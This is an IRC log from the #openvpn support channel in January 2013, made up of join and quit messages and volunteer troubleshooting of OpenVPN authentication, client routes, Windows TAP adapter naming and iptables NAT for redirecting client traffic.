[~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:52 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:57 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:58 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:58 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 18:03 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has joined #openvpn 18:04 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 18:07 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 18:21 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has quit [Remote host closed the connection] 18:41 < Valcorb> hey another question 18:42 < Valcorb> im using user/pass verification 18:42 < Valcorb> but it keeps asking for my user/pass every hour 18:42 < Valcorb> a way to prevent that? 18:52 -!- d12fk [~heiko@exit0.net] has quit [Quit: ZNC - http://znc.sourceforge.net] 18:53 -!- AndChat330644 [~AndChat33@c-24-126-51-244.hsd1.md.comcast.net] has joined #openvpn 18:54 < AndChat330644> My openvpn has been working on Android and suddenly I get the error message. P:OpenVPN ROUTE: OpenVPN needs a gateway parameter for a --route option and no default was specified by either --route-gateway or --ifconfig options 18:56 <+pekster> Valcorb: See --auth-nocache option which I suspect you're using without realizing what it does 18:56 <+pekster> Valcorb: You might also be accepting credentials in a way that's unavailable during re-keying/re-auth, in which case you'd need to explain your setup better 18:57 < Valcorb> is it a client issue? 18:57 <+pekster> Yes 18:57 <+pekster> AndChat330644: Pretty explicit error message. Either push the required gateway value from the server or fix the way you call the 'route' directive to include that gateway client-side 18:57 < Valcorb> yes i'm using auth-nocache 18:57 < Valcorb> should i remove it? 18:58 <+pekster> Valcorb: Why don't you look it up in the manpage and decide if you want it. The description says very specifically what it does 18:58 < Valcorb> aight 18:58 < Valcorb> thanks 18:58 <+pekster> I'm happy to answer questions after you've read the documentation, but it's bad form to come on IRC, get a reference for your problem, and then ask another question before you've read it 19:04 < AndChat330644> I have always pushed a route from server. No change in configuration. After latest application update i get this error. 19:04 < AndChat330644> On client side route is called this way. Route 0.0.0.0 0.0.0.0 19:06 <+pekster> AndChat330644: That only works if the server is pushing the 'route-gateway' value 19:06 <+pekster> Otherwise you'd need to specify the gateway client-side either explicitly as a 3rd parameter to the 'route' directive, or via a separate 'route-gateway' directive (the client can define that too if you're unable or unwilling to push it server-side) 19:11 < dioz> pekster: idk if it's me or what the problem is. 2.1.3 i couldn't get dev-node to change to Local Area Connection 2 19:11 < dioz> error would always say "mytap" so i had to change the name in windows 19:11 < dioz> i thought it was weird 19:11 < dioz> idk if you even remember talking to me ;] i see you here a lot 19:12 < AndChat330644> +pekster now it's complaining about ipv6 gw 19:13 < AndChat330644> thanks for the tips though I now know where to look 19:18 < AndChat330644> http://db.tt/Ttul4PIK 19:18 <@vpnHelper> Title: Dropbox - picsay-1358644668.jpg - Simplify your life (at db.tt) 19:20 < AndChat330644> Screen shot of my config 19:20 <+rob0> screen shot? 19:25 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Ping timeout: 240 seconds] 19:28 < AndChat330644> Lol ro 19:28 < AndChat330644> Auto correct +rob0 19:34 < AndChat330644> Do you happen to know how to ignore --ifconfig-ipv6.. 19:59 -!- s7r [~s7r@openvpn/user/s7r] has quit [Quit: Leaving.] 20:12 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection] 20:22 -!- AndChat330644 [~AndChat33@c-24-126-51-244.hsd1.md.comcast.net] has quit [Quit: Bye] 21:00 -!- thumbs is now known as httpd 21:00 -!- httpd is now known as thumbs 21:07 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Excess Flood] 21:11 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has joined #openvpn 21:16 <+pekster> dioz: Use 'openvpn.exe --show-adapters' to get both the display strings and the CLSID of valid TAP adapters on your system 21:16 <+pekster> You may use either the display name or the CLSID as you prefer 21:23 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 21:39 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 21:41 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 21:58 < dioz> pekster: i tried using the GUID listed in the --show adapters output too 21:58 < dioz> ooor whatever it's called 22:06 -!- nucleo [nucleo@fedora/nucleo] has quit [Quit: just make this person in IRC be quiet http://goo.gl/4RGta] 22:07 <+pekster> dioz: Works fine for me under 2.3.0, and I know I've used it before too 22:07 <+pekster> 'dev-node {0A1B2C3D...}' 22:07 <+pekster> Copy & paste the CLSID output, including the brackets 22:08 <+pekster> dioz: Your log output should show you the deivce name and CLSID too on a line that beigns with: TAP-WIN32 device [Display Name Here] opened: \\.\Global\{CLSID_GOES_HERE}.tap 22:28 -!- Assid [~kvirc@unaffiliated/assid] has joined #openvpn 22:56 -!- Assid [~kvirc@unaffiliated/assid] has quit [Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/] 23:22 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 23:22 -!- mode/#openvpn [+v hazardous] by ChanServ 23:31 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Remote host closed the connection] 23:31 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Remote host closed the connection] 23:31 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Remote host closed the connection] 23:36 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 23:59 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn --- Day changed Sun Jan 20 2013 00:00 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 248 seconds] 00:06 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 00:07 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 276 seconds] 00:09 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 00:12 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Remote host closed the connection] 00:14 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 00:17 -!- nucl3ar [~atom@c-69-247-138-234.hsd1.tn.comcast.net] has joined #openvpn 00:24 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn 00:32 -!- bigmeow [~mirror@184.82.217.174] has quit [Ping timeout: 276 seconds] 00:34 -!- bigmeow [~mirror@184.82.217.174] has joined #openvpn 00:48 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 00:49 -!- Wintereise [Wintereise@113.11.122.231] has quit [Changing host] 00:49 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 01:35 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Ping timeout: 256 seconds] 01:41 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 02:09 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:09 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:10 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:10 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:12 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:12 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:13 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:13 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:14 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:14 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:17 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:17 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:17 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:17 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:18 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:51 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn 03:44 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 03:50 -!- DaIRC49957 [Wintereise@113.11.122.231] has joined #openvpn 03:50 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [Disconnected by services] 03:50 -!- DaIRC49957 is now known as Wintereise 03:50 -!- Wintereise [Wintereise@113.11.122.231] has quit [Changing host] 03:50 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 03:54 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 04:13 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Read error: Connection reset by peer] 04:25 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:46 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 04:46 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 04:46 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:50 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 04:58 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 05:05 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Quit: Leaving] 05:07 -!- ade_b [~Ade@redhat/adeb] has quit [Read error: Operation timed out] 05:13 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 05:23 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 05:23 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 05:23 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:24 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn 05:25 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Remote host closed the connection] 05:32 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Quit: ZNC - http://znc.sourceforge.net] 05:35 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 05:48 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:51 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 260 seconds] 05:56 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:00 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 06:05 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 06:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:12 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn 06:43 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 06:52 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 06:56 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:12 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:15 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:17 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:19 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:22 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:22 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 07:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:27 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:32 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:32 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:35 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:38 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:40 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:43 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:46 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:46 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 07:48 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:49 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:53 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:57 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:59 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:00 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 08:02 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 08:04 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:07 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:11 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:14 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:16 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:20 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:21 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:21 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 08:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:27 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:29 -!- mode/#openvpn [+b *!*@static.88-198-57-152.clients.your-server.de] by ecrist 08:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:34 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 08:36 -!- Freeaqingme [~Freeaqing@91.214.168.110] has quit [Quit: ZNC - http://znc.in] 08:40 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 09:03 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has quit [Quit: Leaving] 09:25 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 09:27 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has joined #openvpn 09:56 -!- lipi [~lipi@69.204.223.87.dynamic.jazztel.es] has joined #openvpn 09:57 < lipi> hello, I would like to create a wizard that includes my certs by default, how can I do this? 09:57 < lipi> and to sets openvpn with service mode and autoconnect at windows startup 10:00 -!- b1rkh0ff [~b1rkh0ff@178.77.21.223] has joined #openvpn 10:06 < lipi> on the other hand, do you think is a very bad practice to give some clients the same certs? 10:06 < lipi> for example, I have an office with 4 static PCs always connected to my VPN.. so in order to minimize deployment costs I manage only 1 cert for these 4 hosts... 10:22 -!- master_of_master [~master_of@p57B53F05.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 10:24 -!- master_of_master [~master_of@p57B52132.dip.t-dialin.net] has joined #openvpn 10:31 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 10:53 -!- Guest15941 [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 10:53 -!- Guest15941 [~Cpt-Obliv@a202101.upc-a.chello.nl] has left #openvpn [] 10:53 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 10:54 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn 10:54 < Cubox> !routing 10:54 < Cubox> !linrouting 10:54 < Cubox> ._. 10:54 < Cubox> !welcome 10:54 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 10:54 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:55 < Cubox> !linredirect 10:55 < Cubox> !redirect 10:55 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 10:55 <@vpnHelper> http://ircpimps.org/redirect.png 10:55 < Cubox> !ipforward 10:55 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward 10:55 < Cubox> !linipforward 10:55 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 11:02 < Cubox> Guess what, I can't route traffic. Using Arch, ufw. openvpn server and client can ping. Have this rule in iptables -t nat -S -A POSTROUTING -s 10.8.0.2/32 -o enp1s0:1 -j MASQUERADE 11:02 -!- Orbi [~opera@anon-149-217.vpn.ipredator.se] has joined #openvpn 11:07 < Cubox> enp1s0:1 is working 11:07 -!- lololojfegdiufhg [~root@thunderaan.cubox.me] has joined #openvpn 11:12 < Cubox> I have the /proc/sys rule for ip forwarding too. 11:17 <+pekster> lipi: You can write your own installation wrapper using NSIS or similar 11:18 <+pekster> lipi: As far as re-use of certs, it's allowed (as long as your server is configured to allow >1 connection from the same CN) but can cause problems if you ever need to revoke the cert of just 1 of the user's or systems, or if you need to identify which user was using a specific IP 11:19 <+pekster> Cubox: What are you trying to do at a high level with openvpn? Redirect all traffic from a client? 11:20 < Cubox> Yep 11:20 < lololojfegdiufhg> redirect-gateway def1 too 11:20 < Cubox> I have push 11:20 < Cubox> Oops 11:20 < Cubox> I have push redirect-gateway def1 on config. 11:20 <+pekster> Cubox: Did you see the flowchart linked in the !redirect output? Follow that and feel free to ask if you get stuck 11:20 <+pekster> It helps guide you through all the steps required for that to work 11:21 < Cubox> firewall issue :P 11:22 <+pekster> Can you pastebin the output of 'iptables-save' ? 11:23 <+pekster> Labeling your interfaces before the output would be helpful too so I know what the uplink and tun devices are 11:23 < Cubox> iptables-save don't give anything... 11:23 <+pekster> It requires root access (like any netfilter command) 11:23 < Cubox> forgot this 11:23 < Cubox> pekster: gg 11:24 < Cubox> http://alduin.cubox.me/files/dump 11:24 < Cubox> you can add .txt if any 11:25 <+pekster> No need, although the MIME type from your server treats it as a binary stream 11:25 <+pekster> Oh, adding .txt to the URI gets your server to do the right thing 11:25 < Cubox> :) 11:26 < Cubox> pasting you ip addr 11:26 <+pekster> enp1s0:1 is your WAN/internet interface? 11:26 < Cubox> http://paste.placeholder.fr/show/172/ 11:26 <+pekster> Ah, nvm, that explains it too :) 11:26 < Cubox> Yes 11:27 <+pekster> You should MASQUERADE the entire VPN network, not just that single host 11:27 < Cubox> I know, Just for migrating server 11:27 <+pekster> huh? 11:27 < Cubox> I need this computer to be linked first 11:27 < Cubox> This computer have his own ip address 11:28 <+pekster> Is the client actually using 10.8.0.2? 11:28 < Cubox> and the others computers will have the enp1s0 ip address 11:28 < Cubox> pekster: yes 11:28 < Cubox> pekster: I can ping it. 11:28 <+pekster> k 11:29 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 11:30 <+pekster> Looks like your FORWARD chain doesn't allow the traffic 11:31 < Cubox> Forward ... 11:31 <+pekster> You need a rule to allow it on the FORWARD chain (or a chain it calls) too, not just the SNAT/MASQUERADE rule 11:31 < Cubox> ╰─➤ cat /etc/default/ufw 1 ↵ 11:31 < Cubox> DEFAULT_FORWARD_POLICY="ACCEPT" 11:31 < Cubox> (this is a part of the file) 11:31 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:31 -!- mode/#openvpn [+v s7r] by ChanServ 11:32 <+pekster> Oh, okay. I blindly assumed the 'ufw-reject-forward' chain would reject it; apparently not 11:32 <+pekster> (those are some ugly rules, but I guess I've just never seen ufw-generated rules before) 11:33 <+pekster> And ipforwarding is on? Can you 'cat /proc/sys/net/ipv4/ip_forward' and get 1? 11:33 < Cubox> Yep, 1 11:33 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection] 11:34 <+pekster> If you do a 'ping 4.2.2.1' or such client-side, can you tcpdump the tun0 interface and see packets? 11:34 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]] 11:35 <+pekster> The server-side firewall looks okay, given the ACCEPT policy on the FORWARD chain (ultimately you probably want to fix that, but it's okay for now for testing) 11:35 < Cubox> Doing that 11:37 < Cubox> 18:36:56.205183 IP 10.8.0.2 > 8.8.8.8: ICMP echo request, id 24294, seq 79, length 64 11:37 < Cubox> 18:36:56.610825 IP 10.8.0.2.54554 > Alduin.60001: UDP, length 94 11:37 < Cubox> 18:36:56.761679 IP Alduin > 10.8.0.2: ICMP Alduin udp port 60001 unreachable, length 130 11:38 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [Read error: Connection reset by peer] 11:38 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 11:38 < Cubox> strange o.O 11:38 <+pekster> So the ping goes through (not sure about that UDP stuff, but I'll happily ignore that for now.) You get no reply though 11:39 < Cubox> 18:37:09.216401 IP 10.8.0.2 > 8.8.8.8: ICMP echo request, id 24294, seq 92, length 64 11:39 < Cubox> and no reply 11:39 <+pekster> If you do the same dump on the outside-facing interface do you see the packet go out? 'tcpdump -pnvi enpls0 and host 8.8.8.8' ? 11:39 <+pekster> (that tcpdump will make sure it doesn't spam you with normal traffic during the dump) 11:40 <+pekster> Erm, no 'and' 11:40 <+pekster> Just 'host 8.8.8.8' 11:41 <+pekster> Maybe it's not going out that interface? 11:41 < Cubox> enp1s0 or enp1s0:1 ? 11:41 <+pekster> If you get no traffic doing that tcpdump, please post output of 'ip route show table all' 11:41 <+pekster> Oh, right, 'enpls0' since the alias is just that 11:41 <+pekster> My guess is that it's using the wrong interface, namely the primary IP on that interface, not the alias 11:42 <+pekster> Actually, you might be able to verify that via 'iptables -t nat -xnvL POSTROUTING' too 11:42 < Cubox> http://paste.placeholder.fr/show/173/ 11:42 <+pekster> If you see a '0' in the packet column (that's the rule hitcount) then it's not getting matched 11:42 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 11:42 <+pekster> Yea, so your're not SNAT'ing the traffic 11:43 <+pekster> I don't think you can MASQUERADE on an alias like that 11:43 < Cubox> http://paste.placeholder.fr/show/174/ 11:43 <+pekster> You can't magically make traffic come from a 2nd IP like that; you need routing rules/tables to do that 11:45 < Cubox> hmm 11:45 <+pekster> Cubox: So, that default route on line 2 of the route output, means that it goes out via the primary IP of enpls0, not any of the secondary ones 11:45 <+pekster> You can't match on an alias like that in netfilter, becuase the alias doesn't actually exist (it's just a 2nd IP on the same interface) 11:46 < Cubox> yeah, I see 11:46 <+pekster> If you want to use a 2nd upstream IP, you need to specificlly declare it in the 'src' attribute of a routing table entry, and if you don't want that to be the default for all packets, you must define routing rules to send the traffic to a non-default routing table 11:46 <+pekster> see 'man ip' for the syntax, and 'ip route help' and 'ip rule help' for rule/route specific usage commands 11:46 <+pekster> It's non-trivial to set up policy routing like that 11:47 <+pekster> Here's a nifty guide from the LARTC group: http://lartc.org/howto/ 11:47 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Ping timeout: 256 seconds] 11:47 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org) 11:47 <+pekster> If you're already very familiar with 'ip' command usage, you can skip to chapter 4. Otherwise, starting at the beeginning will help you understand what's going on 11:48 <+pekster> Cubox: Hmm, maybe you can try using -j SNAT --to-source 192.95.18.155 ? 11:48 <+pekster> I don't actually know if that does the right thing or not, but it might be worth a shot 11:49 <+pekster> Since it's the same interface, it might just work. Also change your -o to read simply '-o enpls0' without the alias 11:49 < Cubox> pekster: Where do I add this ? 11:50 <+pekster> In the firewall output you gave me, change line 7 to read like so: -A POSTROUTING -s 10.8.0.2/32 -o enp1s0 -j SNAT --to-source 192.95.18.155 11:52 < Cubox> zomfg 11:52 < Cubox> pekster: Marry me. 11:52 < Cubox> pekster: are you a girl ? 11:52 <+pekster> Congrats. And I'm merely a screenname on the Internet 11:53 <+pekster> So, the issue is that the MASQUERADE target always uses the primary IP of an interface (see the iptables-extensions manpage for details) 11:53 < Cubox> yeah 11:53 <+pekster> You didn't want that, and your routing table already handled the next-hop properly 11:53 <+pekster> Normally you can't use SNAT like that, but both your different IPs are on the same interface, so it all works out without work defining policy routing 11:54 < Cubox> :) 11:54 < Cubox> Thanks :) 11:54 <+pekster> Yup 11:54 < Cubox> Next step : IPv6 11:54 < Cubox> but not today ! 11:54 <+pekster> At least there's no NAT there... 11:54 < Cubox> yes. 11:54 < Cubox> but i'm not really good at routing :P 11:55 < Cubox> specially with IPv6 11:55 <+pekster> Same game, bigger numbers 11:55 < Cubox> yeah 11:56 -!- lololojfegdiufhg [~root@thunderaan.cubox.me] has quit [Quit: WeeChat 0.3.9.2] 11:59 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Read error: Operation timed out] 12:22 -!- AlbinoGeek [AcademyInt@academyintl/director/AcademyIntl] has quit [Quit: I need a new quit message.] 12:28 -!- lipi [~lipi@69.204.223.87.dynamic.jazztel.es] has quit [Quit: Me'n vaig] 12:36 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 12:39 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection] 12:39 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 12:54 -!- Tomoyo [Wintereise@113.11.122.231] has joined #openvpn 12:54 -!- Tomoyo is now known as Guest47194 12:58 -!- Wintereise [Wintereise@113.11.122.231] has quit [Ping timeout: 248 seconds] 13:02 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 13:03 -!- Orbi [~opera@anon-149-217.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 13:06 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 13:07 -!- [fred] [fred@konfuzi.us] has joined #openvpn 13:07 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has quit [Ping timeout: 246 seconds] 13:08 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 13:11 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 13:13 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 13:14 -!- Guest47194 [Wintereise@113.11.122.231] has quit [Ping timeout: 256 seconds] 13:26 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 13:27 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 13:29 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 13:45 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn 13:52 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Quit: Rolybrau] 14:11 -!- Porkepix [~Porkepix@lns-bzn-45-82-65-137-188.adsl.proxad.net] has quit [Ping timeout: 260 seconds] 14:13 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-63-56.adsl.proxad.net] has joined #openvpn 